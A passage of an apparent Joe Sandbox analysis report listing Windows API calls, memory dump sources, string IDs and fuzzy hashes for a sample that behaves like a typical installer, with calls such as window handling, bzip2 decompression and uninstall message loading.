                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                            • API String ID: 667068680-2254406584
                                                                            • Opcode ID: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                            • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                                            • Opcode Fuzzy Hash: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                            • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                            • API String ID: 190572456-212574377
                                                                            • Opcode ID: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                            • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                                            • Opcode Fuzzy Hash: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                            • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                              • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                              • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                              • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                            • API String ID: 142928637-2676053874
                                                                            • Opcode ID: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                            • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                                            • Opcode Fuzzy Hash: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                            • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                            • API String ID: 2238633743-1050967733
                                                                            • Opcode ID: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                            • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                                            • Opcode Fuzzy Hash: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                            • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                            • API String ID: 667068680-222143506
                                                                            • Opcode ID: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                            • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                                            • Opcode Fuzzy Hash: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                            • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 0041B58E
                                                                            • 7427A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                            • 74284620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                            • 742AE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                            • 742AE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                            • 7427A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 7427E680$74284620A480A570Focus
                                                                            • String ID:
                                                                            • API String ID: 3042314804-0
                                                                            • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                            • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                            • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                            • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                            APIs
                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                            • API String ID: 1452528299-1580325520
                                                                            • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                            • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                                            • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                            • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                            • 7427A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                            • 74284620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                            • 74284620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                            • 7427A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 742774284620MetricsSystem$A480A570
                                                                            • String ID:
                                                                            • API String ID: 1789013595-0
                                                                            • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                            • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                            • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                            • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                            APIs
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$Show
                                                                            • String ID:
                                                                            • API String ID: 3609083571-0
                                                                            • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                            • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                                            • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                            • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                                            APIs
                                                                              • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                            • String ID:
                                                                            • API String ID: 3527656728-0
                                                                            • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                            • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                            • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                            • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                            APIs
                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                            • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                              • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                              • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                            • API String ID: 3312786188-1660910688
                                                                            • Opcode ID: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                            • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                                            • Opcode Fuzzy Hash: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                            • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                            • API String ID: 828529508-2866557904
                                                                            • Opcode ID: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                            • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                                            • Opcode Fuzzy Hash: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                            • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                                            APIs
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                                            • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                                            • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                            • API String ID: 2573145106-3235461205
                                                                            • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                            • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                                            • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                            • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                            • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                            • API String ID: 3478007392-2498399450
                                                                            • Opcode ID: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                            • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                                            • Opcode Fuzzy Hash: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                            • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                            • API String ID: 1782028327-3855017861
                                                                            • Opcode ID: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
